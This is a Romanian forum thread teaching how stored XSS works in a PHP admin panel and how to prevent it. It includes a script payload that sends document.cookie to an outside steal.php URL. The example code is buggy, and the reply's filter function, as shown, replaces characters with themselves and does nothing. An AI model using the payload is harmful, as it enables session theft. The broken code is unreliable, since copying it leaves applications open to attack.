Jump to content
chessh

Cum sa te protejezi de XSS

Recommended Posts

Cum sa te protejezi de XSS

Definitia XSS-ului

Un atac XSS (Cross-Site Scripting) reprezinta o vulnerabilitate a aplicatiilor web ce apare atunci cand acestea afisaza date care nu sunt valide. Acesta consta in introducerea unui cod, pentru executia acestuia in respectivul site. De obicei, codul este scris in unul din urmatoarele limbaje: JavaScript, (X)HTML, VBScript, ActiveX, Java sau Flash (ar mai fi si altele).

Scopul XSS-ului

Scopul acestui tip de atac este de a fura cookie-urile unor anumiti utilizatori sau pentru a fura diferite informatii utile despre utilizatori, necesare hackerilor. In general aceste atacuri ii vizeaza pe cei cu drepturi privilegiate ale aplicatiei web (administratori sau alt rang important).

In general atacurile implica doua lucruri (hackerul si site-ul), insa XSS-ul implica trei (hackerul, site-ul si utilizatorii site-ului).

Despre XSS

Atacurile de acest tip se folosesc de datele ce vin din exterior. Asadar formularele, e-mail-ul web, fisierele de tip XML sau RSS si bazele de date sunt cel mai des folosite de hackeri.

Pentru a intelege mai bine, va voi face o schema, dupa care actioneaza majoritatea hackerilor.

  1. Hackerul intra pe site
  2. Hackerul verifica daca vulnerabilitatea este prezenta
  3. In cazul in care site-ul este vulnerabil, el introduce date care vor fi stocate in baza de date
  4. Un utilizator intra pe o pagina a site-ului care se conecteaza la baza de date si afisaza datele stocate in aceasta (incluzand cele introduse de hacker)
  5. Cookie-urile utilizatorului sunt trimise hackerului

Exemplu XSS

Va voi arata prin acest exemplu, cum un hacker poate fura un cont cu ajutorul acestei vulnerabilitati.

Vom crea o noua baza de date (folosind phpMyAdmin) numita xss si tabelul users, cu doua campuri: user si pass.

CREATE DATABASE xss;
USE xss;
CREATE TABLE users (id INT NOT NULL AUTO_INCREMENT,
user VARCHAR(20) NOT NULL,
pass VARCHAR(32) NOT NULL,
PRIMARY KEY(id));

Avem urmatorul script simplu de inregistrare:

<html>
<head>
<title>Script inregistrare</title>
</head>
<body>
<?php
if(isset($_POST['submit'])) {
$_POST['user'] = mysql_real_escape_string($_POST['user']);
$_POST['pass'] = md5($_POST['pass']);
@mysql_connect('localhost', 'root', '') or die('MySQL error.');
@mysql_select_db('xss') or die('MySQL error.');
$sql = "INSERT INTO users (user, pass) VALUES ('{$_POST['user']}', '{$_POST['pass']}')";
$result = @mysql_query($sql) or die('MySQL error.');
@mysql_close();
} else { ?>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
Username: <input type="text" name="user" />
Password: <input type="password" name="pass" />
<input type="submit" name="submit" value="Register" />
</form>
<?php } ?>
</body>
</html>

Acum, o parte din codul panoului de administrare a site-ului, in care sunt afisati utilizatorii inregistrati:

<html>
<head>
<title>Panou de administrare</title>
</head>
<body>
Utilizatori inregistrati:

<?php
@mysql_connect('localhost', 'root', '') or die('MySQL error.');
@mysql_select_db('xss') or die('MySQL error.');
$sql = "SELECT * FROM users";
$result = @mysql_query($sql) or die('MySQL error.');
while($result = mysql_fetch_array($result)) {
echo $row['user'].'
';
} ?>
</body>
</html>

Acum sa vedem ce se intampla. Daca de exemplu, hackerul introduce in campul user urmatorul cod JavaScript:

<script>alert("Ti-am spart site-ul!");</script>

Cand administratorul va intra pe pagina care afisaza utilizatorii inregistrati, va aparea o caseta JavaScript care va afisa 'Ti-am spart site-ul!' (fara ghilimele). Pana acum, nimic grav. In cazul in care hackerul introduce codul urmator:

<script>document.location = 'http://www.site.com/steal.php?cookies=' + document.cookie;</script>

Cand administratorul va intra pe pagina care afisaza utilizatorii inregistrati, cookie-urile sale vor fi trimise catre 'http://www.site.com/steal.php' prin variabila $_GET['cookies']. Hackerul poate folosi aceste cookie-uri si poate capata acces in panoul de administrare.

Pentru a preveni acest lucru, scriptul de afisare al utilizatorului va trebui sa arate asa:

<html>
<head>
<title>Panou de administrare</title>
</head>
<body>
Utilizatori inregistrati:

<?php
@mysql_connect('localhost', 'root', '') or die('MySQL error.');
@mysql_select_db('xss') or die('MySQL error.');
$sql = "SELECT * FROM users";
$result = @mysql_query($sql) or die('MySQL error.');
while($result = mysql_fetch_array($result)) {
echo htmlentities($row['user']).'
';
} ?>
</body>
</html>

Asadar, functia htmlentities() este folosita pentru a preveni introducerea sau injectarea a unui astfel de cod, ea ignorand tag-urile.

Prevenirea XSS-ului

Asadar cum putem preveni atacurile XSS? Cateva functii PHP care ne vor ajuta sunt:

  1. htmlentities();
  2. htmlspecialchars();
  3. strip_tags();
  4. mysql_escape_string();
  5. mysql_real_escape_string();
  6. addslashes();

Sper sa va fie de folos. Daca am vreo greseala, va rog postati un reply.

Link to comment
Share on other sites

poti sa treci de html_entities daca nu il folosesti corect

eu prefer


function filterCross($filterMe)
{
$tempMe = $filterMe;
$filterMe = str_replace("&", "&", $filterMe);
//$filterMe = str_replace("#", "#", $filterMe);
$filterMe = str_replace("<", "<", $filterMe);
$filterMe = str_replace(">", ">", $filterMe);
//$filterMe = str_replace("(", "(", $filterMe);
//$filterMe = str_replace(")", ")", $filterMe);
$filterMe = str_replace('"', """, $filterMe);
$filterMe = str_replace("'", "'", $filterMe);
//$filterMe = str_replace("+", "+", $filterMe);

if (strcmp($tempMe,$filterMe))
{
//logHacker();
}
return $filterMe;
}

functia e scoasa dintr-un site de-al meu

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...